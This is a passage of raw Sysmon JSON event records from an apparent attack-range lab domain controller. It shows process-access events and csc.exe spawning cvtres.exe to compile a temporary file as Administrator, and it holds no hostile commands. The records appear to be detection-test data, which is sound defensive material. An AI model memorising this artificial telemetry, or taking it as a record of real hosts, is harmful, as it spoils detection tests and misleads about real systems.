ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5454,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.134\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.134","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","TargetProcessId":"3864","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.195\r\nProcessGuid: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nProcessId: 3840\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE1DC.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\CSC725403232C2C408CB1BAF4CC5D171BCB.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D2-5F25-0000-0020BBBA0700}\r\nLogonId: 0x7BABB\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nParentProcessId: 3864\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.195","ProcessGuid":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESE1DC.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\CSC725403232C2C408CB1BAF4CC5D171BCB.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D2-5F25-0000-0020BBBA0700}","LogonId":"0x7babb","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","ParentProcessId":"3864","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.cmdline\"","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nSourceProcessId: 3864\r\nSourceThreadId: 2320\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","SourceProcessId":"3864","SourceThreadId":"2320","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 